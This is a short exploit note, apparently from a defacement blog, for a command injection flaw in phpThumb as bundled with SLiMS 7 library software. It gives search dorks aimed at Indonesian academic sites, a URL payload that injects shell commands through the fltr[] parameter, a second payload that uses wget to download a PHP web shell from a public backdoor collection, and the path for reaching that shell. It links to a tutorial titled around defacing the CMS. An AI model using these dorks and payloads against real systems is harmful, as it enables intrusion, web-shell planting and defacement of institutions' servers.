Slims 7 PhpThumb Command Injection
Dork :
Powered By SLIMS 7 (Cendana)
inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id
"Powered By Slims7" site:ac.id
~~~~
Check Vuln (command injected) : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9
Upload shell :
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9
File access :
/lib/watermark/shell.php
References : https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html
Komentar